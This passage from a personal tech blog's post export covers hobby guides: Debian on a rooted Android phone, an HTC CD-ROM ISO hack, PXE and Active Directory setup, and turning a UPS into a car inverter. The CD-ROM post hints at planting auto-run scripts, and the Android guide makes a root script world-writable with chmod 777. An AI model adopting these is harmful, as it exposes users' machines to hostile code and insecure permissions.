scratch you will not be able to see as much.\nAbove is the main screen. You can see a tree list structure of all of your repositories, components, and architectures.\nAbove you can see the list of all repositories on the system.\nClicking on a repository brings you to the repository page; shown above. It will list all of the packages in the repository.\nOne very nice feature is the ability to search from a web browser.\nIf you choose to use PHPRepo to manager your repository, the above screen will allow you to add/upload packages to your repository. Simply select the file, distribution, and component. If the distribution or component that you want does not exist you can create it. All details about the package such as name, arch, etc are read from the deb file upon upload. Its like magic!\nIf you click on a package you will be taken to the screen above. This page lets you view the details of the package. You can also manually downland the deb file, or a Maemo .install file. You can also manage the file by deleting its entry in the repository or by deleting the entry and remove the actual file from the server.\nIf you choose to delete a file you will see the above screen asking if you are sure.\nThe above screen is for deleting an entire repository, and all packages associated with it.\nConclusion As stated before, I made this program over a year ago to fill a void. And I was rather surprised that nothing like this already existed. In any case the program and its source code can be downloaded from its project hosted at Google Code.\nPHPRepo at Google Code\n","permalink":"https://lanrat.com/posts/phprepo/","summary":"\u003cp\u003eThis is about a piece of software I wrote over a year ago to fit a need I had at the time. It probably will not receive any updates but I have released the source to anyone is free to do as they please with it.\u003c/p\u003e\n\u003ch2 id=\"background\"\u003eBackground\u003c/h2\u003e\n\u003cp\u003ePHPRepo is a PHP CMS for managing Debian package repositories. A while ago I wanted to start my own repository for some of my own packages, so I looked for an easy way to do this. I found none. At the time the only way to run and manage a Debian package repository was through apt at the command line, and since at the time I was learning PHP I decided to write my own software to fill this void. Thus I created PHPRepo. PHPRepo has very minimal requirements and can work alongside an existing repository that is managed with apt.\u003c/p\u003e","title":"PHPRepo"},{"content":"This is a minimalistic how-to to get a Debian environment running on almost any (rooted) android phone. I adopted the method here: https://www.saurik.com/id/10 to be more universal and added some new features.\nPreparing the Debian Image You will need access to a computer running a Debian based distribution to create the image for you phone. I used Ubuntu 10.04. To create the image you need to install a program called debootstrap. debootstrap will allow you to create a mini Debian install in your image.\nAfter installing debootstrap you will need to create a filesystem image for android to use and for debootstrap to install Debian to. You can use the dd command to create the image. In my example below I made a 800MB image. Once the image is made, you need to format it to a Linux file system.\nOnce your image is formatted you should mount it and then run debootstrap.\nBelow are my example commands, you may want/need to change them to fit your environment. Such as the Debian mirror, file size, etc.\nsudo -s apt-get install debootstrap dd if=/dev/zero of=debian.img seek=838860800 bs=1 count=1 mke2fs -F debian.img mkdir debian mount -o loop debian.img debian/ debootstrap --verbose --arch armel --foreign lenny debian http://ftp.us.debian.org/debian umount debian/ rm -r debian/ Preparing the Debian boot script Below is my Debian boot script (named bootdebian). I created it off the boot Ubuntu script for the HTC Droid Incredible, but modified it. My script includes the ability to become root if you are not already root, and it will mount your Incredible\u0026rsquo;s SD card and internal memory inside Debian so that you can easily move files in and out of your chrooted environment. I also fixed some small errors on the other script. If you are not using the HTC Incredible you will want to change lines 38-47 to reflect your phone\u0026rsquo;s memory mount points.\nEDIT 10/18/10 Not everybody\u0026rsquo;s phone will use /dev/block/mtdblock3 for the /system mount point. Type the mount command to see what the proper mount point is on your device. The one used in this guide is for the HTC Incredible.\nif [[ $EUID -ne 0 ]] then echo \u0026#34;Becoming ROOT!\u0026#34; su -c bootdebian exit 1 fi echo \u0026#34;Mounting system as R/W\u0026#34; mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system echo \u0026#34;Setting some stuff up..\u0026#34; export bin=/system/bin export img=/mnt/sdcard/debian.img export mnt=/data/local/debian export PATH=$bin:/usr/bin:/usr/sbin:/bin:$PATH export TERM=linux export HOME=/root if [ ! -d $mnt ] then mkdir $mnt fi echo \u0026#34;Mounting the Linux Image\u0026#34; mknod /dev/block/loop5 b 7 0 #may already exist losetup /dev/block/loop5 $img mount -t ext2 -o noatime,nodiratime /dev/block/loop5 $mnt mount -t devpts devpts $mnt/dev/pts mount -t proc proc $mnt/proc mount -t sysfs sysfs $mnt/sys echo \u0026#34;Setting Up Networking\u0026#34; sysctl -w net.ipv4.ip_forward=1 echo \u0026#34;nameserver 8.8.8.8\u0026#34; \u0026gt; $mnt/etc/resolv.conf echo \u0026#34;nameserver 8.8.4.4\u0026#34; \u0026gt;\u0026gt; $mnt/etc/resolv.conf echo \u0026#34;127.0.0.1 localhost\u0026#34; \u0026gt; $mnt/etc/hosts echo \u0026#34;Mounting sdcard and emmc in /mnt\u0026#34; if [ ! -d $mnt/mnt/emmc ] then mkdir $mnt/mnt/emmc fi busybox mount --bind /mnt/emmc/ $mnt/mnt/emmc if [ ! -d $mnt/mnt/sdcard ] then mkdir $mnt/mnt/sdcard fi busybox mount --bind /mnt/sdcard/ $mnt/mnt/sdcard echo \u0026#34;Entering CHROOT \u0026#34; echo \u0026#34; \u0026#34; chroot $mnt /bin/bash echo \u0026#34; \u0026#34; echo \u0026#34;Shutting down CHROOT\u0026#34; umount $mnt/mnt/emmc umount $mnt/mnt/sdcard sysctl -w net.ipv4.ip_forward=0 umount $mnt/dev/pts umount $mnt/proc umount $mnt/sys umount $mnt losetup -d /dev/block/loop5 mount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system Now move both the above script and the debian.img file you made to your phone\u0026rsquo;s memory card.\nFinishing up the Image Now we need to finish up the install on your phone. Open the terminal app you plan to use on your phone, I recommend ConnectBot. First we will re-mount the system partition as Read/Write, them move out bootdebian script over, make it executable, then remove it from the SD card. Then we run the bootdebian script and run the second stage of debootstrap.The second stage of debootstrap will take a while, it took me 15 minutes. Let it run. Once debootstrap has finished we will add the official Debian repository into the system, then use apt-get to remove the files left over by debootstrap. Here are the commands:\nsu mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system cat /sdcard/bootdebian \u0026gt; /system/xbin/bootdebian rm /sdcard/bootdebian chmod 777 /system/xbin/bootdebian bootdebian /debootstrap/debootstrap --second-stage echo \u0026#39;deb http://ftp.us.debian.org/debian lenny main\u0026#39; \u0026gt; /etc/apt/sources.list apt-get autoclean apt-get update exit You are done Now you can run bootdebian anytime from your phone\u0026rsquo;s terminal to enter a full Debian system. You can apt-get install any Debian package that has been compiled to armel. 🙂\nIf you want to go further you can install X, and a VNC server. This would allow you to VNC into the Debian system from your phone giving you a full X environment.\nNow go enjoy your full Linux distribution on your phone!\n","permalink":"https://lanrat.com/posts/install-debian-on-android/","summary":"\u003cp\u003eThis is a minimalistic how-to to get a Debian environment running on almost any (rooted) android phone. I adopted the method here: \u003ca href=\"https://www.saurik.com/id/10\"\u003ehttps://www.saurik.com/id/10\u003c/a\u003e to be more universal and added some new features.\u003c/p\u003e\n\u003ch2 id=\"preparing-the-debian-image\"\u003ePreparing the Debian Image\u003c/h2\u003e\n\u003cp\u003eYou will need access to a computer running a Debian based distribution to create the image for you phone. I used Ubuntu 10.04. To create the image you need to install a program called debootstrap. debootstrap will allow you to create a mini Debian install in your image.\u003c/p\u003e","title":"Install Debian on Android"},{"content":"The official HTC Incredible 2.2 update added a new feature to the ROM. When the phone is connected to a computer via USB, even if the memory card is not mounted, it will act as a virtual CD-ROM. It basically just acts as a CR-ROM drive with the disk image found in /system/etc/CDROM.ISO. The default ISO was some annoying Verizon thing. Most (rooted) users simply deleted the ISO from their system. I however found a way to make this feature a bit more useful.\nEnabling and Disabling the CD-ROM the Right Way The first way most people disabled this was to delete the ISO. This is not the correct way of doing it. Just deleting the file will still have the phone show an empty CD-ROM drive when plugged in to a computer. There is a nice ON/OFF switch for the CD-ROM that can be changed by anyone (non-rooted users) To enable/disable the CD-ROM feature follow these steps:\nDial ##7764726 Press Call Enter the password 000000 (6 zeros) Select Feature Settings Select CD-ROM Choose Enable or Disable Press Menu Select Commit Modifications (Don\u0026rsquo;t worry if it says no settings changed) Press Home Using Your Own ISO The ISO file that is mounted needs to be named CDROM.ISO in /system/etc/. So, after deleting the default ISO image (via the good old rm command) you can replace it with any ISO image you want. However this will be difficult with large ISOs and it will be a pain to mount system with R/W access and use the command line every time you want to change the ISO. So I propose this alternate solution, use a symbolic link! I made a symbolic link in /system/etc/CDROM.ISO that points to a CDROM.ISO on my internal memory card. To do this run this command as root:\nrm /system/etc/CDROM.ISO #if you have not yet deleted the CD-ROM image ln /emmc/CDROM.ISO /system/etc/CDROM.ISO Replace /emmc/ with /sdcard/ if you want to use your SD card and not the phone\u0026rsquo;s internal memory.\nFinishing Up Now place a ISO file on either your SD card or internal memory and it should be mounted as a CD-ROM drive. I\u0026rsquo;ll let you be creative with what you could put in there (cough auto-run scripts cough). Unfortunately I cannot seem to get computers to boot off the ISO using this method. I\u0026rsquo;m guessing that it is because when the Incredible mounts the ISO it strips the boot flag. Also, since this hack will make the Incredible always access either your internal memory or your SD card, when selecting mount over USB the drive holding the ISO will be busy or in use by the system and sometimes will not mount on the computer. This can be fixed by force unmounting the drive (in your phone\u0026rsquo;s settings menu) or by temporarily disabling the CD-ROM feature (see above).\nTo my knowledge this hack only applies to the HTC Incredible with the official 2.2 build or ROMs built off of the official 2.2 build. Please let me know in the comments if this works on any other phones.\n","permalink":"https://lanrat.com/posts/htc-incredible-virtual-cd-rom-hack/","summary":"\u003cp\u003eThe official HTC Incredible 2.2 update added a new feature to the ROM. When the phone is connected to a computer via USB, even if the memory card is not mounted, it will act as a virtual CD-ROM. It basically just acts as a CR-ROM drive with the disk image found in \u003ccode\u003e/system/etc/CDROM.ISO\u003c/code\u003e. The default ISO was some annoying Verizon thing. Most (rooted) users simply deleted the ISO from their system. I however found a way to make this feature a bit more useful.\u003c/p\u003e","title":"HTC Incredible Virtual CD-ROM Hack"},{"content":"The PC I wanted a HTPC that I could use to play anything, and that could do anything. And since it was going to be hooked up to a big TV, it might as well be powerful enough to play some modern games on the big screen. I chose to use a relatively new computer (Core 2 Duo 2Ghz, Nvidia GeForce GT 220) and run Windows 7. My previous HTPC ran Linux, but with a powerful enough computer, the ability to play games on the HTPC made me move to Windows.\nThe Three HTPC pieces I find that XBMC, Hulu Desktop, and Boxee are all essential parts of a well rounded Home Theater PC (HTPC). XBMC Is great for managing and playing back all of your local media. Hulu Desktop is the complete solution to play anything from Hulu on the big screen. And Boxee does a great job of playing back other online media, such as The Daily Show, Pandora, etc. However these three media center programs do not play nice together. There are some small hacks that can make maybe two get along, but not a complete solution.\nThe Glue To control all three programs I use EventGhost. EventGhost is a Windows automation tool which can preform a set of actions based on some user input, Usually a key-press, remote control, or other such device. I was lucky enough to have a HP remote control and USB IR sensor from a laptop I had. pictured below:\nWindows 7 automatically recognized the driver for the remote and with the MCE Remote plugin I was able to have EventGhost use it as an input device. I set EventGhost to capture all of the remote\u0026rsquo;s input and unregister it as a HID device. This stops windows from acting on the remote and gives EventGhost complete control over it.\nNext I started creating my EventGhost profile. I chose a button to launch each of the HTPC apps previously mentioned. When pressed, the action for the button would kill any/all running HTPC apps and then start the app that I assigned to the button. This allows me to start any of the apps from the remote and switch between them easily. I also assigned a fourth button that would just kill them all, bringing me to the windows desktop. I assigned the D-PAD and OK buttons to the arrow keys and enter key. That takes care of most of the universal buttons that should apply across all of the programs. Now I went of to the program specific stuff. Hulu Desktop does not need much else or accept any other keyboard shortcuts, but Boxee and XBMC share a few. The next buttons I mapped to the remote are [Backspace], I, [Space], P, X, [Period], [Comma], F, R, H, [Tab], and M. Refer to the Program\u0026rsquo;s site to see what each one does. I also added a few extra actions for raising and lowering the volume, ejecting the drive tray, and powering off the computer.\nI also made a toggle button that would change the D-Pad and OK button from arrow keys and enter to mouse movement and left click. You can download my EventGhost config file at the end of this article. Below is what my configured EventGhost looks like:\nBy now the HTPC setup should be working. You should be able to control and switch between Boxee, XBMC, and Hulu desktop all from your remote. Just remember to make EventGhost start when windows does, this can be easily done by placing a shortcut to EventGhost in your User\u0026rsquo;s startup folder.\nAn Extra Surprise After using this method for a while, I discovered that the MCE remote would detect my TV\u0026rsquo;s remote control (Pictured below). I could tell because the USB sensor would light up red (showing that it received a signal) when I pressed a button on the TV remote. And low and behold, EventGhost could detect the signal too!\nThis Toshiba remote is also programmable, meaning that it has the ability to also control your VCR, DVD player, etc. I went through all of the preset codes it can use (by entering them all manually and testing them) and found the one that the USB IR sensor would detect the most buttons on. For most, only a few worked, and some none did. Oddly enough the code \u0026ldquo;000\u0026rdquo; had almost all the buttons working. So I went through all the actions in EventGhost and reassigned them to a button on my TV\u0026rsquo;s remote. This allows me to control both my TV and HTPC from the same remote. All I need to do is switch the Mode/Device at the bottom of the remote to change which device I am controlling.\n","permalink":"https://lanrat.com/posts/use-eventghost-to-make-a-xbmc-hulu-and-boxee-htpc/","summary":"\u003ch2 id=\"the-pc\"\u003eThe PC\u003c/h2\u003e\n\u003cp\u003eI wanted a HTPC that I could use to play anything, and that could do anything. And since it was going to be hooked up to a big TV, it might as well be powerful enough to play some modern games on the big screen. I chose to use a relatively new computer (Core 2 Duo 2Ghz, Nvidia GeForce GT 220) and run Windows 7. My previous HTPC ran Linux, but with a powerful enough computer, the ability to play games on the HTPC made me move to Windows.\u003c/p\u003e","title":"Use EventGhost to Make a XBMC Hulu and Boxee HTPC"},{"content":"This is a simple how-to on using Microsoft\u0026rsquo;s Active Directory for user authentication on Linux systems. The method described in this guide should work for Cent OS, Red Hat Enterprise Linux (RHEL), and Fedora. Debian based distributions do not have the tools used in this method and require a different setup. This guide used Cent OS 5.5 with a minimal text only install, however it should apply the same to other compatible versions of Linux.\nInstalling the Software We will need two packages installed to join the Active Directory (AD) domain and use it for user authentication, authconfig and samba-common. authconfig should be installed by default but with a minimal install you will need to install samba. Install them with the following command:\nyum install samba-common authconfig Setting up Authconfig Start authconfig by running authconfig-tui, if you have a graphical desktop such as gnome installed you can launch it from System-\u0026gt;Administration-\u0026gt;Authentication but this guide will cover the text/cli version. But the same steps apply to both methods.\nUnder user information select \u0026ldquo;Use Windbind\u0026rdquo;\nUnder authentication select \u0026ldquo;Use MD5 Passwords\u0026rdquo;, \u0026ldquo;Use Shadow Passwords\u0026rdquo;, \u0026ldquo;Use Windbind Authentication\u0026rdquo;, and \u0026ldquo;Local authorization is Sufficient\u0026rdquo;.\nYour screen should look like this:\nClick Next\nChange the \u0026ldquo;Security Model\u0026rdquo; to \u0026ldquo;domain\u0026rdquo;\nUnder \u0026ldquo;Domain\u0026rdquo; enter your active directory domain.\nEnter the FQDN (fully-qualified domain name) of your domain servers, if you have more than one you can separate them with a comma.\nThe ADS realm is the full domain, it must be in call caps.\nTo allow users to login change the template shell to /bin/bash, or whatever shell you prefer.\nThe screen should now look like this, but with your correct information:\nSelect OK.\nSetting Up Samba Now you need to edit /etc/samba/smb.conf. You will see many of the settings you just entered in this file, however we still need to manually change one value that authconfig does not do for us. Look for \u0026ldquo;windbind use default domain\u0026rdquo; and change it from false to true.\nSetting up PAM PAM controls user logins. and we need to create a home directory for domain users on their first login. All domain users will have a home directory in /home/Domain/user, where Domain is your domain and user is their username. Create the Domain folder inside the /home directory with the mkdir command as root.\nNext we need to enable the user\u0026rsquo;s home directory creation in PAM. Edit /etc/pam.d/system-auth. Scroll to the end of the file and at the end add this:\nsession optional pam_mkhomedir.so Save the file and exit. To make these changes take effect we need to restart the windbind service and the oddjobd service. This can usually be done with the service command. I will not cover that here.\nJoining the Domain Now that the system is configured correctly we will actually join the system to the Active Directory domain. run the \u0026ldquo;authconfig-tui\u0026rdquo; program again. Click next. And this time on the second screen select \u0026ldquo;Join Domain\u0026rdquo;. Enter a domain administrator\u0026rsquo;s username and password and join the domain. After entering the credentials select OK to save and exit.\nYou are now done. You should be able to log out (as root) and log in as any domain member. Upon first login your come directory should be created automatically.\n","permalink":"https://lanrat.com/posts/use-active-directory-for-linux-logins/","summary":"\u003cp\u003eThis is a simple how-to on using Microsoft\u0026rsquo;s Active Directory for user authentication on Linux systems. The method described in this guide should work for Cent OS, Red Hat Enterprise Linux (RHEL), and Fedora. Debian based distributions do not have the tools used in this method and require a different setup. This guide used Cent OS 5.5 with a minimal text only install, however it should apply the same to other compatible versions of Linux.\u003c/p\u003e","title":"Use Active Directory for Linux logins"},{"content":"A car inverter will take the 12 volts DC from your car, usually from your cigarette lighter, and turn it into 110 volts AC, which is what you get out of your home power outlets. This allows you to plug household electronics into your car. The most common would probably be your laptop. Home UPS systems do the same thing, except instead of using a car outlet they use a 12 volt battery. I used a old home UPS system I had laying around that had a bad battery. (We don\u0026rsquo;t use the battery in this mod)\nPreparing the UPS Here is the UPS before any modifications:\nOnly half of the outlets on the device are given power from the UPS system, the rest act as a regular surge strip. The first thing I did was rewire the \u0026ldquo;surge\u0026rdquo; outlets to be wired into the UPS power so that all of the outlets would be provided power from the UPS system.\nNext I took a car plug adapter I had lying around and connected it to the battery terminals after removing the battery.\nTesting The UPS system was working and outputting ~106 volts AC from a car\u0026rsquo;s 12 volts outlet. Here you can see it in action with my meter and a wireless router.\nThis worked great, but the UPS has a buzzer in it which stayed on. The purpose of this buzzer was to notify you that your power is out and that you are on battery power. However it serves us no purpose and is just really annoying. I fixed it by desoldering the buzzer from the main circuit board.\nSome Final Modifications In addition to removing the buzzer, I also wanted to make the device smaller as half of it is empty space due to the lack of a battery.\nI started by moving two of the LEDs that are on the batter end over to the power switch. I moved just the Power and Overload LEDs, as the rest served no purpose for an inverter.\nI used a pipe saw to cut off the battery compartment, there was already a divider on the inside that would now act as the outside wall on that end.\nThis UPS works perfectly as a power inverter. I have used it on several road trips just fine, And because it was intended to be a computer UPS, it can power 350 watts, which is much more than your average car inverter.\n","permalink":"https://lanrat.com/posts/build-your-own-car-power-inverter/","summary":"\u003cp\u003eA car inverter will take the 12 volts DC from your car, usually from your cigarette lighter, and turn it into 110 volts AC, which is what you get out of your home power outlets. This allows you to plug household electronics into your car. The most common would probably be your laptop. Home UPS systems do the same thing, except instead of using a car outlet they use a 12 volt battery. I used a old home UPS system I had laying around that had a bad battery. (We don\u0026rsquo;t use the battery in this mod)\u003c/p\u003e","title":"Build Your Own Car Power Inverter"},{"content":"This guide will tell you how to let a windows computer make use of your N810\u0026rsquo;s GPS as if it was its own. While the Nokia N810 does not have the best GPS in the world it is still better than no GPS. On a recent road trip I wanted a way to visualize my trip route on a more powerful device than my N810\u0026rsquo;s 400MHz processor and Maemo Mapper. I wanted the full use of my laptop, Google Earth and the Internet.\nPreparing The Tablet The built in GPS software does not allow us do do anything advanced like this. We will be using Minigpsd as a replacement for the built in GPS interface software. Minigpsd allows for many more advanced options for the GPS, and may even assist in getting locks faster. Install Minigpsd from the above link. After the installation is complete open up the settings and click the \u0026ldquo;Advanced\u0026rdquo; button. Here you will be able to see and set the ports Minigpsd communicates on. You can either leave them at their defaults or change them however you see fit. Below is a screenshot of my configuration.\nNow you need to network the Tablet and your Computer. In my case (On a road trip) I was unable to have an access point around, especially in a moving car. So I used an Ad-Hoc Wireless network. But you can use any method you want, including Bluetooth Pan or over your cellular network. I will not go into how to set this up here.\nPreparing The Computer Assuming that your computer is now networked to your N810 you will need software than can take the GPS data from the N810 over the network and bring it to the computer in a form it can use. The best software that I could find that does this is HW Group\u0026rsquo;s Virtual Serial Port. This software will take the GPS data and make a virtual serial port. From your computer\u0026rsquo;s point of view it will think that there is a serial GPS attached to it.\nSimply start up the virtual serial port software and create a new virtual serial port. It will need an IP address and port. the IP is the IP of your tablet and the port is the \u0026ldquo;gps direct\u0026rdquo; port. In the above example it is 22947. Once the port is created make sure your N810 is on, able to ping it from your computer, and GPSD is running.\nTesting It Out Your computer should now see your N810 as a RAW serial GPS device. To test it out install some GPS aware software. I used Google Earth.\nOn Google Earth open Tools -\u0026gt; GPS -\u0026gt; Real Time you should see the following:\nIf you want to start tracking of the N810, click start. You can change the frequency of the position updates by changing the \u0026ldquo;Polling interval\u0026rdquo;.\nAn alternate method of setting this up without the use of any serial-port emulator on the computer is to use Google Earth\u0026rsquo;s Network Link function. This will allow Google Earth to look on the N810 for a kml file containing its current longitude and latitude, and use that instead. This KML file can be found on GPSD\u0026rsquo;s internal web server. On the above example we can see I have it set to run on port 8888. Below is my example configuration:\nI suggest you uncheck \u0026ldquo;Allow this folder to be expanded\u0026rdquo; because this file will only contain one updating set of points. also, if you want to use this for real time tracking set the \u0026ldquo;Time-Based Refresh\u0026rdquo; to Periodically, and the number of seconds you want between updates. the lower the more smooth the movement will appear.\nThis concept should work with any GPSD compatible device, including other computers and some modern cell phones. And is in no way limited to Google Earth. I have also tested it with NetStumbler and inSSIDer.\n","permalink":"https://lanrat.com/posts/n810-as-computer-gps/","summary":"\u003cp\u003eThis guide will tell you how to let a windows computer make use of your N810\u0026rsquo;s GPS as if it was its own. While the Nokia N810 does not have the best GPS in the world it is still better than no GPS. On a recent road trip I wanted a way to visualize my trip route on a more powerful device than my N810\u0026rsquo;s 400MHz processor and \u003ca href=\"https://garage.maemo.org/projects/maemo-mapper/\"\u003eMaemo Mapper\u003c/a\u003e. I wanted the full use of my laptop, \u003ca href=\"https://earth.google.com/\"\u003eGoogle Earth\u003c/a\u003e and the Internet.\u003c/p\u003e","title":"N810 as Computer GPS"},{"content":"I recently got a HTC Incredible to replace my aging LG Chocolate. One feature of the Incredible was video out. Specifically the ability to output composite video to a TV. The cable was first demoed by WireFly here: https://www.youtube.com/watch?v=eJyt463AoOA And since then threads like these have started trying to hunt down the cable. And it looks like one day it may be sold at HTC Pedia or at Ben\u0026rsquo;s Bazaar. But for the time being this cable is not being sold anywhere, and there is a rumor that it may never be commercially sold.\nLuckily smokeynerd over at XDA Developers made a cable for himself and got the pinouts of the extra 7 pins in the Incredible\u0026rsquo;s Micro-USB port. See this thread: https://forum.xda-developers.com/showthread.php?p=6647344. With this information I set out to make my own cable. My first attempt was just to verify that it worked, and it was a success. I used alligator clips and needles to make the connection to the video out and ground. But this was not a practical solution because I needed to hold the needles in just the right place so that they would make contact.\nNow that I knew that it worked I set out to find something a little more practical. I found a ribbon cable that was just the right size and had the correct pin alignment in an old laptop, (By old I mean it was so old it used the same processor as a desktop, think under 100Mhz). Without thinking twice I scrapped the laptop and used the cable. This ribbon cable was not enough on its own, I also used a standard micro-usb cable to hold it in place, which also allowed the Incredible to charge/sync while the video out is in use. I used two alligator clips much like I did the first time to make the connections to the TV. Below you can see the ribbon cable and micro-USB.\nHere is a video of the final result:\nIt works, but I will still be looking into improving it, specifically removing the need for alligator clips. I also noticed that a few pixels are being cut off. This is not a limitation of my cable, this is probably software related, but could possibly have something to do with the Incredible\u0026rsquo;s video out hardware. When In landscape mode about 5 pixels are missing from the left and when in portrait, both the top and bottom are being cut off. There are also bars on the TV (At least on mine) that go around the entire image, reducing the Incredible\u0026rsquo;s viewing area. I was also unable to get the audio to work via this connector, and the Incredible disables its speaker when using video out, however the headphone output still works.\nUpdate I was able to fix the missing pixels and bars by adjusting my TV\u0026rsquo;s \u0026ldquo;picture size\u0026rdquo;. But I need to re-adjust it every time it switched from landscape to portrait or vise-versa. Hopefully this is just a problem with this particular TV. Below you can see the Phone\u0026rsquo;s screen without any bars or missing pixels on my TV.\nLinks Forum thread with pinouts Youtube Demo ","permalink":"https://lanrat.com/posts/htc-incredible-video-out/","summary":"\u003cp\u003eI recently got a HTC Incredible to replace my aging LG Chocolate. One feature of the Incredible was video out. Specifically the ability to output composite video to a TV. The cable was first demoed by WireFly here: \u003ca href=\"https://www.youtube.com/watch?v=eJyt463AoOA\"\u003ehttps://www.youtube.com/watch?v=eJyt463AoOA\u003c/a\u003e And since then \u003ca href=\"https://www.droidforums.net/forum/droid-incredible-accessories/41047-micro-mini-usb-incredible.html\"\u003ethreads\u003c/a\u003e like \u003ca href=\"https://androidforums.com/htc-incredible/68032-tv-out-cable-htc-incredible.html\"\u003ethese\u003c/a\u003e have started trying to hunt down the cable. And it looks like one day it may be sold \u003ca href=\"http://shop.htcpedia.com/index.php?dispatch=products.view\u0026amp;amp;product_id=875\u0026amp;amp;compability_product=757\"\u003eat HTC Pedia\u003c/a\u003e or \u003ca href=\"http://www.bensbazaar.com/htc-oem-brand-name-av-micro-cable-for-htc-incredible-73h0034800m.html\"\u003eat Ben\u0026rsquo;s Bazaar\u003c/a\u003e. But for the time being this cable is not being sold anywhere, and there is a rumor that it may never be commercially sold.\u003c/p\u003e","title":"HTC Incredible Video Out"},{"content":"PXE is a method for booting an operating system over a network, it stands for Pre-Executable environment. Here I will show you how to build a PXE server to boot and or install operating systems over your network.\nInstalling the server OS I made this server inside VMWare, however the steps are the same if you are using a different virtual machine server or a physical machine. I used Debian 5.0 and used the net-install iso. Since we will only be needing a bare Debian install and just a few extra packages there is no need to download/install the entire OS.\nOnce you boot the installer follow all the installation prompts and enter the values that apply to you (language/timezone/password/etc). When tasksel runs I would recommend you unselect all the options to get the smallest install possible.\nAfter this the installation will finish, the computer will reboot and you will be presented with a login prompt.\nInstalling and Setting up the required Services Now that you have a fresh install of Debian install the required packages\napt-get install tftpd-hpa dhcp3-server lftp This will install the TFTP server and a DHCP server, the two programs needed to load files over PXE. Next we need to configure the network to be static. Edit /etc/network/interfaces and change the network configuration to something like this:\niface eth1 inet static address 192.168.1.6 netmask 255.255.255.0 gateway 192.168.1.1 Now restart the network interface with ifdown eth1; ifup eth1 to have the new settings take effect.\nNext we want to edit /etc/dhcp3/dhcpd.conf. this is the configuration file for the dhcp server. You can look at the default file to see how it is setup, but we don\u0026rsquo;t need it. replace it with:\nallow booting; allow bootp; option domain-name-servers 192.168.1.1; default-lease-time 86400; max-lease-time 604800; authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.200; filename \u0026#34;pxelinux.0\u0026#34;; next-server 192.168.1.6; option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; } This will configure your dhcp server to hand out addresses between 192.168.1.100-200, use a router of 192.168.1.1. And if the dhcp client asks the dhcp server for boot information it will tell it to load a file named pxelinux.0 from 192.168.1.6, which is our server. DHCP is now setup.\nNow we need to edit the tftp settings. Edit /etc/default/tftpd-hpa. Change the RUN_DAEMON to yes and change the options directory to /tftp, save and close the file. Now run mkdir -p /tftp to create our tftp folder. this will be the server root.\nNow start the PXE server with:\n/etc/init.d/dhcp3-server start /etc/init.d/tftpd-hpa start Setting up the PXE tftp folder In the root of the tftp folder we need to have pxelinux.0. this is the file that our DHCP server tells the client to download. You can download the latest version from here: https://www.kernel.org/pub/linux/utils/boot/syslinux/ you will need pxelinux.0 found in the core folder of the zip. Place pxelinux.0 in the /tftp folder. Next create a pxelinux.cfg folder inside /tftp. And inside the pxelinux.cfg folder create a default file. This file will contain the boot information for clients if there is not a file that matched their MAC address. If there is one it would be in the pxelinux.cfg folder. Inside of default put:\nDISPLAY boot.txt DEFAULT debian_install LABEL debian_install kernel debian/etch/i386/linux append vga=normal initrd=debian/lenny/i386/initrd.gz LABEL memtest kernel memdisk append initrd=memtest.img LABEL DSL kernel dsl/linux24 append ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=791 initrd=dsl/minirt24.gz nomce noapic quiet BOOT_IMAGE=knoppix PROMPT 1 TIMEOUT 0 And now create a boot.txt in your /tftp folder with the following contents:\n=PXE Boot Menu= +++++++++++++++ options are: debian_install DSL memtest Now the boot.txt will be displayed allowing you to enter a label that is defined in default and it will boot that kernel with the given options. You can edit default and boot.txt however you like. In the examples iv given you have the option to install Debian, boot memtest, or boot damn small Linux. However we are still missing a vital part of the pxe server. We need the actual boot files. You can download the Debian files The DSL and memtest files can be found on their appropriate websites.\nEach boot option should go in its own folder inside the /tftp folder. In the above example Debian is in the debian folder, DSL is in the dsl folder. However because memtest is only a single file I put it directly in the tftp root. Remember you must edit the default file to contain the correct boot arguments and kernel for what you are trying to boot.\nHappy Network Booting!\nPXE from Syslinux\n","permalink":"https://lanrat.com/posts/building-a-pxe-server/","summary":"\u003cp\u003ePXE is a method for booting an operating system over a network, it stands for Pre-Executable environment. Here I will show you how to build a PXE server to boot and or install operating systems over your network.\u003c/p\u003e\n\u003ch2 id=\"installing-the-server-os\"\u003eInstalling the server OS\u003c/h2\u003e\n\u003cp\u003eI made this server inside VMWare, however the steps are the same if you are using a different virtual machine server or a physical machine. I used Debian 5.0 and used the net-install iso. Since we will only be needing a bare Debian install and just a few extra packages there is no need to download/install the entire OS.\u003c/p\u003e","title":"Building a PXE Server"},{"content":"This guide will tell you how to rename or switch network controller names in Linux. Often when installing Linux the installer will automatically pick the names of the network controllers. And for some reason the order it names them is almost always not the order I want them in. I usually like the primary/on-board card eth0, and all additional cards eth1-n, however the installer often has its own ideas. So this is how to correct it!\nFirst off we need to tell the kernel which name gets associated with which physical card. On Debian based systems the information is in /etc/udev/rules.d/70-persistent-net.rules and on Redhat based systems it is in /etc/sysconfig/network-scripts/ifcfg-ethX. You will need to edit those files as root. In each file will be a line for each network controller with its mac address, driver, and name. You want to just edit the name to be what you want. For me that is often just changing eth0 to eth1 and vise-versa. When you are done you may save these files.\nNext you need to configure the IP information for the controllers. Edit (as root) /etc/network/interfaces. This file contains the IP address settings for each adapter. If you want eth0 to USE DHCP use:\nauto eth0 iface eth0 inet dhcp If you want to set up a static IP address use:\niface eth1 inet static address 192.168.1.5 netmask 255.255.255.0 gateway 192.168.1.1 But obviously change the settings to fit your needs.\nNow save that file and reboot to apply the changes.\nStack Overflow Question on this\nManual temporary configuration As you should know ifup ethX turns on the network interface and ifdown ethX turns it off, but these only work if the above interfaces file is configured correctly. If the file is configured incorrectly or you want to temporarily use a different configuration you can do so with these commands. Note that the adapter must be in the \u0026ldquo;down\u0026rdquo; state before issuing these. you can do this by running \u0026ldquo;ifdown ethX\u0026rdquo;\nifconfig [device] [static ip ] netmask [network mask] gateway [router ip] up Or\nifconfig [device] dhcp start This will bring your current network adapter up with a temporary configuration which will be cleared next time the adapter is brought down (either manually or by a reboot)\n","permalink":"https://lanrat.com/posts/switch-network-interface-in-linux/","summary":"\u003cp\u003eThis guide will tell you how to rename or switch network controller names in Linux. Often when installing Linux the installer will automatically pick the names of the network controllers. And for some reason the order it names them is almost always not the order I want them in. 